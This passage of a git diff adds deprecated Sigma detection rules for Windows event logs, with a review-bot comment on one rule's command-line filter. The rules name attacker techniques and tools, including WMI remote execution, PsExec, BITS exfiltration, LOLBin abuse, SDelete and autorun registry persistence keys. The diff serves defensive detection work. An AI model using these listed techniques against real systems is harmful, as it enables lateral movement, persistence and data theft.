+ - \klcp_update_task.xml
+ condition: process_creation and (schtasks and option and not 1 of filter_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml
new file mode 100644
index 000000000..8c760ed60
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml
@@ -0,0 +1,49 @@
+title: Stop Windows Service
+id: eb87818d-db5d-49cc-a987-d5da331fbd90
+status: deprecated
+description: Detects a Windows service to be stopped
+author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali
+date: 2019/10/23
+modified: 2023/03/05
+tags:
+ - attack.impact
+ - attack.t1489
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_sc_net_img:
+ - OriginalFileName:
+ - sc.exe
+ - net.exe
+ - net1.exe
+ - NewProcessName|endswith:
+ - \sc.exe
+ - \net.exe
+ - \net1.exe
+ selection_sc_net_cli:
+ CommandLine|contains: ' stop '
+ selection_pwsh:
+ CommandLine|contains: 'Stop-Service '
+ NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ filter:
+ CommandLine:
+ - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop
+ - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service
+ SubjectUserName|contains: # covers many language settings
+ - AUTHORI
+ - AUTORI
+ condition: process_creation and ((all of selection_sc_net* and not filter) or selection_pwsh)
+fields:
+ - SubjectUserName
+ - ComputerName
+ - CommandLine
+falsepositives:
+ - Administrator shutting down the service due to upgrade or removal purposes
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml
new file mode 100644
index 000000000..6ea020f40
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml
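Review bot: The `filter` relies on exact `CommandLine:` matches, and its own comment says the Kaspersky entry depends on a double space between `sc` and `stop`, yet the value as it appears here carries a single space; if that is the committed content rather than a display artifact, the exclusion never applies and the console's routine stop commands alert on every run. Exact matching is also brittle against path-qualified invocations (`C:\Windows\System32\sc.exe stop ...`), so `CommandLine|endswith:` with ` stop KSCWebConsoleMessageQueue` and ` stop LGHUBUpdaterService` would be sturdier while the `SubjectUserName|contains` clause still bounds the exclusion to the built-in account. Worth verifying the whitespace in the generated file with a hex view before merging.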
@@ -0,0 +1,33 @@
+title: Suspicious Bitstransfer via PowerShell
+id: cd5c8085-4070-4e22-908d-a5b3342deb74
+status: deprecated
+description: Detects transferring files from system on a server bitstransfer Powershell cmdlets
+references:
+ - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
+author: Austin Songer @austinsonger
+date: 2021/08/19
+modified: 2023/01/10
+tags:
+ - attack.exfiltration
+ - attack.persistence
+ - attack.t1197
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - Get-BitsTransfer
+ - Add-BitsFile
+ NewProcessName|endswith:
+ - \powershell.exe
+ - \powershell_ise.exe
+ - \pwsh.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml
new file mode 100644
index 000000000..7f71f3bf5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml
@@ -0,0 +1,32 @@
+title: Suspicious Cmd Execution via WMI
+id: e31f89f7-36fb-4697-8ab6-48823708353b
+status: deprecated
+description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.
+references:
+ - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html
+author: Tim Rauch
+date: 2022/09/27
+modified: 2023/01/19
+tags:
+ - attack.execution
+ - attack.t1047
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: \\\\127.0.0.1\\
+ NewProcessName|endswith: \cmd.exe
+ ParentProcessName|endswith: \WmiPrvSE.exe
+ selection_opt:
+ CommandLine|contains:
+ - 2>&1
+ - 1>
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml
new file mode 100644
index 000000000..ca6ecabd8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml
@@ -0,0 +1,36 @@
+title: Suspicious Characters in CommandLine
+id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9
+status: deprecated
+description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion
+references:
+ - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
+author: Florian Roth (Nextron Systems)
+date: 2022/04/27
+modified: 2023/03/03
+tags:
+ - attack.defense_evasion
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_spacing_modifiers:
+ CommandLine|contains: # spacing modifier letters that get auto-replaced
+ - ˣ # 0x02E3
+ - ˪ # 0x02EA
+ - ˢ # 0x02E2
+ selection_unicode_slashes: # forward slash alternatives
+ CommandLine|contains:
+ - ∕ # 0x22FF
+ - ⁄ # 0x206F
+ selection_unicode_hyphens: # hyphen alternatives
+ CommandLine|contains:
+ - ― # 0x2015
+ - — # 0x2014
+ condition: process_creation and (1 of selection*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml
new file mode 100644
index 000000000..cb7b132a3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml
@@ -0,0 +1,45 @@
+title: Wscript Execution from Non C Drive
+id: 5b80cf53-3a46-4adc-960b-05ec19348d74
+status: deprecated
+description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.
+references:
+ - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt
+ - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/
+author: Aaron Herman
+date: 2022/10/01
+modified: 2023/08/29
+tags:
+ - attack.execution
+ - attack.t1059
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_lolbin:
+ NewProcessName|endswith:
+ - \wscript.exe
+ - \cscript.exe
+ selection_exetensions:
+ CommandLine|contains:
+ - .js
+ - .vbs
+ - .vbe
+ selection_drive_path:
+ CommandLine|contains: :\
+ filter_drive_path:
+ CommandLine|contains:
+ - ' C:\\'
+ - " 'C:\\"
+ - ' "C:\\'
+ filter_env_vars:
+ CommandLine|contains: '%'
+ filter_unc_paths:
+ CommandLine|contains: ' \\\\'
+ condition: process_creation and (all of selection_* and not 1 of filter_*)
+falsepositives:
+ - Legitimate scripts located on other partitions such as "D:"
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml
new file mode 100644
index 000000000..4509714ea
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml
@@ -0,0 +1,40 @@
+title: Process Start From Suspicious Folder
+id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b
+status: deprecated
+description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files
+references:
+ - Malware sandbox results
+author: frack113
+date: 2022/02/11
+modified: 2022/11/03
+tags:
+ - attack.execution
+ - attack.t1204
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|contains:
+ - \Desktop\
+ - \Temp\
+ - \Temporary Internet
+ filter_parent:
+ - ParentProcessName:
+ - C:\Windows\System32\cleanmgr.exe
+ - C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe
+ - C:\Windows\System32\dxgiadaptercache.exe
+ - ParentProcessName|startswith: C:\Program Files (x86)\NVIDIA Corporation\
+ filter_other:
+ NewProcessName|endswith: setup.exe
+ filter_edge:
+ NewProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\
+ NewProcessName|endswith: .tmp\MicrosoftEdgeUpdate.exe
+ condition: process_creation and (selection and not 1 of filter*)
+falsepositives:
+ - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml
new file mode 100644
index 000000000..be453a803
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml
@@ -0,0 +1,86 @@
+title: Squirrel Lolbin
+id: fa4b21c9-0057-4493-b289-2556416ae4d7
+status: deprecated
+description: Detects Possible Squirrel Packages Manager as Lolbin
+references:
+ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/
+ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
+author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+date: 2019/11/12
+modified: 2023/02/14
+tags:
+ - attack.execution
+ - attack.defense_evasion
+ - attack.t1218
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ NewProcessName|endswith: \update.exe
+ selection2:
+ CommandLine|contains:
+ - --processStart
+ - --processStartAndWait
+ - --createShortcut
+ filter_discord:
+ CommandLine|contains|all:
+ - C:\Users\
+ - \AppData\Local\Discord\Update.exe
+ - ' --processStart'
+ - Discord.exe
+ filter_github_desktop:
+ CommandLine|contains|all:
+ - C:\Users\
+ - \AppData\Local\GitHubDesktop\Update.exe
+ - GitHubDesktop.exe
+ CommandLine|contains:
+ - --createShortcut
+ - --processStartAndWait
+ filter_teams:
+ CommandLine|contains|all:
+ - C:\Users\
+ - \AppData\Local\Microsoft\Teams\Update.exe
+ - Teams.exe
+ CommandLine|contains:
+ - --processStart
+ - --createShortcut
+ condition: process_creation and (all of selection* and not 1 of filter_*)
+falsepositives:
+ - 1Clipboard
+ - Beaker Browser
+ - Caret
+ - Collectie
+ - Discord
+ - Figma
+ - Flow
+ - Ghost
+ - GitHub Desktop
+ - GitKraken
+ - Hyper
+ - Insomnia
+ - JIBO
+ - Kap
+ - Kitematic
+ - Now Desktop
+ - Postman
+ - PostmanCanary
+ - Rambox
+ - Simplenote
+ - Skype
+ - Slack
+ - SourceTree
+ - Stride
+ - Svgsus
+ - WebTorrent
+ - WhatsApp
+ - WordPress.com
+ - Atom
+ - Gitkraken
+ - Slack
+ - Teams
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml
new file mode 100644
index 000000000..ef3efe58e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml
@@ -0,0 +1,42 @@
+title: PsExec Tool Execution
+id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
+related:
+ - id: 42c575ea-e41e-41f1-b248-8093c3e82a28
+ type: derived
+status: deprecated
+description: Detects PsExec service execution via default service image name
+references:
+ - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet
+author: Thomas Patzke
+date: 2017/06/12
+modified: 2023/02/28
+tags:
+ - attack.execution
+ - attack.t1569.002
+ - attack.s0029
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|endswith: \PSEXESVC.exe
+ SubjectUserName|contains: # covers many language settings
+ - AUTHORI
+ - AUTORI
+ condition: process_creation and selection
+fields:
+ - EventID
+ - CommandLine
+ - ParentCommandLine
+ - ServiceName
+ - ServiceFileName
+ - TargetFilename
+ - PipeName
+falsepositives:
+ - Unknown
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml
new file mode 100644
index 000000000..2e5894547
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml
@@ -0,0 +1,25 @@
+title: PsExec Service Start
+id: 3ede524d-21cc-472d-a3ce-d21b568d8db7
+status: deprecated
+description: Detects a PsExec service start
+author: Florian Roth (Nextron Systems)
+date: 2018/03/13
+modified: 2023/02/28
+tags:
+ - attack.execution
+ - attack.s0029
+ - attack.t1569.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine: C:\Windows\PSEXESVC.exe
+ condition: process_creation and selection
+falsepositives:
+ - Administrative activity
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml
new file mode 100644
index 000000000..a45f1cabd
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml
@@ -0,0 +1,32 @@
+title: Run Whoami as SYSTEM
+id: 80167ada-7a12-41ed-b8e9-aa47195c66a1
+status: deprecated
+description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
+references:
+ - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
+author: Teymur Kheirkhabarov, Florian Roth
+date: 2019/10/23
+modified: 2023/02/28
+tags:
+ - attack.privilege_escalation
+ - attack.discovery
+ - attack.t1033
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_user:
+ SubjectUserName|contains: # covers many language settings
+ - AUTHORI
+ - AUTORI
+ selection_img:
+ - OriginalFileName: whoami.exe
+ - NewProcessName|endswith: \whoami.exe
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Possible name overlap with NT AUHTORITY substring to cover all languages
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml
new file mode 100644
index 000000000..1ea5ae2e7
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml
@@ -0,0 +1,29 @@
+title: Winword.exe Loads Suspicious DLL
+id: 2621b3a6-3840-4810-ac14-a02426086171
+status: deprecated
+description: Detects Winword.exe loading a custom DLL using the /l flag
+author: Victor Sergeev, oscd.community
+references:
+ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
+date: 2020/10/09
+modified: 2022/07/25
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: /l
+ NewProcessName|endswith: \winword.exe
+ condition: process_creation and selection
+fields:
+ - CommandLine
+falsepositives:
+ - Unknown
+level: medium
+tags:
+ - attack.defense_evasion
+ - attack.t1202
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml
new file mode 100644
index 000000000..9ce7b16a3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml
@@ -0,0 +1,41 @@
+title: WMI Execution Via Office Process
+id: 518643ba-7d9c-4fa5-9f37-baed36059f6a
+related:
+ - id: e1693bc8-7168-4eab-8718-cdcaa68a1738
+ type: derived
+ - id: 438025f9-5856-4663-83f7-52f878a70a50
+ type: similar
+status: deprecated
+description: Initial execution of malicious document calls wmic to execute the file with regsvr32
+references:
+ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
+ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
+author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)
+date: 2021/08/23
+modified: 2023/02/04
+tags:
+ - attack.t1204.002
+ - attack.t1047
+ - attack.t1218.010
+ - attack.execution
+ - attack.defense_evasion
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \wbem\WMIC.exe
+ - OriginalFileName: wmic.exe
+ selection_parent:
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \excel.exe
+ - \powerpnt.exe
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml
new file mode 100644
index 000000000..9ef16d68a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml
@@ -0,0 +1,34 @@
+title: WMI Remote Command Execution
+id: e42af9df-d90b-4306-b7fb-05c863847ebd
+status: deprecated
+description: An adversary might use WMI to execute commands on a remote system
+references:
+ - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
+ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
+author: frack113
+date: 2022/03/13
+modified: 2023/02/14
+tags:
+ - attack.execution
+ - attack.t1047
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
+ selection_cli:
+ CommandLine|contains|all:
+ - '/node:'
+ - process
+ - call
+ - create
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml
new file mode 100644
index 000000000..a4b6c7189
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml
@@ -0,0 +1,36 @@
+title: WMI Reconnaissance List Remote Services
+id: 09af397b-c5eb-4811-b2bb-08b3de464ebf
+status: deprecated
+description: |
+ An adversary might use WMI to check if a certain Remote Service is running on a remote device.
+ When the test completes, a service information will be displayed on the screen if it exists.
+ A common feedback message is that "No instance(s) Available" if the service queried is not running.
+ A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md
+ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
+author: frack113
+date: 2022/01/01
+modified: 2023/02/14
+tags:
+ - attack.execution
+ - attack.t1047
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
+ selection_cli:
+ CommandLine|contains|all:
+ - '/node:'
+ - service
+ condition: process_creation and (all of selection*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml
new file mode 100644
index 000000000..7a4d54c9a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml
@@ -0,0 +1,38 @@
+title: Windows Update Client LOLBIN
+id: d7825193-b70a-48a4-b992-8b5b3015cc11
+status: deprecated
+description: Detects code execution via the Windows Update client (wuauclt)
+references:
+ - https://dtm.uk/wuauclt/
+author: FPT.EagleEye Team
+date: 2020/10/17
+modified: 2023/11/11
+tags:
+ - attack.command_and_control
+ - attack.execution
+ - attack.t1105
+ - attack.t1218
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \wuauclt.exe
+ - OriginalFileName: wuauclt.exe
+ selection_cli:
+ CommandLine|contains|all:
+ - /UpdateDeploymentProvider
+ - /RunHandlerComServer
+ - .dll
+ filter:
+ CommandLine|contains:
+ - ' /ClassId '
+ - ' wuaueng.dll '
+ condition: process_creation and (all of selection* and not filter)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml b/tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml
new file mode 100644
index 000000000..f8cdc01f9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml
@@ -0,0 +1,26 @@
+title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction
+id: fde7929d-8beb-4a4c-b922-be9974671667
+description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
+references:
+ - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
+author: Ensar Şamil, @sblmsrsn, OSCD Community
+date: 2020/10/05
+modified: 2022/04/11
+tags:
+ - attack.defense_evasion
+ - attack.t1218
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|endswith: \SyncAppvPublishingServer.exe
+ condition: process_creation and selection
+falsepositives:
+ - App-V clients
+level: medium
+status: deprecated
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml
new file mode 100644
index 000000000..85fd9ba57
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml
@@ -0,0 +1,28 @@
+title: Sysinternals SDelete Registry Keys
+id: 9841b233-8df8-4ad7-9133-b0b4402a9014
+status: deprecated
+description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.
+references:
+ - https://github.com/OTRF/detection-hackathon-apt29/issues/9
+ - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md
+author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+date: 2020/05/02
+modified: 2023/02/07
+tags:
+ - attack.defense_evasion
+ - attack.t1070.004
+logsource:
+ product: windows
+ category: registry_add
+detection:
+ registry_add:
+ EventID: 4657
+ Channel: Security
+ selection:
+ OperationType: '%%1904'
+ ObjectName|contains: \Software\Sysinternals\SDelete
+ condition: registry_add and selection
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml
new file mode 100644
index 000000000..4469a5721
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml
@@ -0,0 +1,208 @@
+title: Autorun Keys Modification
+id: 17f878b8-9968-4578-b814-c4217fc5768c
+description: Detects modification of autostart extensibility point (ASEP) in registry.
+status: deprecated
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
+ - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+date: 2019/10/25
+modified: 2022/05/14
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton
+logsource:
+ category: registry_event
+ product: windows
+level: medium
+detection:
+ registry_event:
+ EventID: 4657
+ Channel: Security
+ main_selection:
+ ObjectName|contains:
+ - \SOFTWARE\Wow6432Node\Microsoft\Windows CE Services\AutoStart
+ - \Software\Wow6432Node\Microsoft\Command Processor\Autorun
+ - \SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
+ - \SOFTWARE\Microsoft\Windows CE Services\AutoStartOnDisconnect
+ - \SOFTWARE\Microsoft\Windows CE Services\AutoStartOnConnect
+ - \SYSTEM\Setup\CmdLine
+ - \Software\Microsoft\Ctf\LangBarAddin
+ - \Software\Microsoft\Command Processor\Autorun
+ - \SOFTWARE\Microsoft\Active Setup\Installed Components
+ - \SOFTWARE\Classes\Protocols\Handler
+ - \SOFTWARE\Classes\Protocols\Filter
+ - \SOFTWARE\Classes\Htmlfile\Shell\Open\Command\(Default)
+ - \Environment\UserInitMprLogonScript
+ - \SOFTWARE\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe
+ - \Software\Microsoft\Internet Explorer\UrlSearchHooks
+ - \SOFTWARE\Microsoft\Internet Explorer\Desktop\Components
+ - \Software\Classes\Clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\Inprocserver32
+ - \Control Panel\Desktop\Scrnsave.exe
+ session_manager_base:
+ ObjectName|contains: \System\CurrentControlSet\Control\Session Manager
+ session_manager:
+ ObjectName|contains:
+ - \SetupExecute
+ - \S0InitialCommand
+ - \KnownDlls
+ - \Execute
+ - \BootExecute
+ - \AppCertDlls
+ current_version_base:
+ ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion
+ current_version:
+ ObjectName|contains:
+ - \ShellServiceObjectDelayLoad
+ - \Run
+ - \Policies\System\Shell
+ - \Policies\Explorer\Run
+ - \Group Policy\Scripts\Startup
+ - \Group Policy\Scripts\Shutdown
+ - \Group Policy\Scripts\Logon
+ - \Group Policy\Scripts\Logoff
+ - \Explorer\ShellServiceObjects
+ - \Explorer\ShellIconOverlayIdentifiers
+ - \Explorer\ShellExecuteHooks
+ - \Explorer\SharedTaskScheduler
+ - \Explorer\Browser Helper Objects
+ - \Authentication\PLAP Providers
+ - \Authentication\Credential Providers
+ - \Authentication\Credential Provider Filters
+ nt_current_version_base:
+ ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion
+ nt_current_version:
+ ObjectName|contains:
+ - \Winlogon\VmApplet
+ - \Winlogon\Userinit
+ - \Winlogon\Taskman
+ - \Winlogon\Shell
+ - \Winlogon\GpExtensions
+ - \Winlogon\AppSetup
+ - \Winlogon\AlternateShells\AvailableShells
+ - \Windows\IconServiceLib
+ - \Windows\Appinit_Dlls
+ - \Image File Execution Options
+ - \Font Drivers
+ - \Drivers32
+ - \Windows\Run
+ - \Windows\Load
+ wow_current_version_base:
+ ObjectName|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion
+ wow_current_version:
+ ObjectName|contains:
+ - \ShellServiceObjectDelayLoad
+ - \Run
+ - \Explorer\ShellServiceObjects
+ - \Explorer\ShellIconOverlayIdentifiers
+ - \Explorer\ShellExecuteHooks
+ - \Explorer\SharedTaskScheduler
+ - \Explorer\Browser Helper Objects
+ wow_nt_current_version_base:
+ ObjectName|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion
+ wow_nt_current_version:
+ ObjectName|contains:
+ - \Windows\Appinit_Dlls
+ - \Image File Execution Options
+ - \Drivers32
+ wow_office:
+ ObjectName|contains: \Software\Wow6432Node\Microsoft\Office
+ office:
+ ObjectName|contains: \Software\Microsoft\Office
+ wow_office_details:
+ ObjectName|contains:
+ - \Word\Addins
+ - \PowerPoint\Addins
+ - \Outlook\Addins
+ - \Onenote\Addins
+ - \Excel\Addins
+ - \Access\Addins
+ - test\Special\Perf
+ wow_ie:
+ ObjectName|contains: \Software\Wow6432Node\Microsoft\Internet Explorer
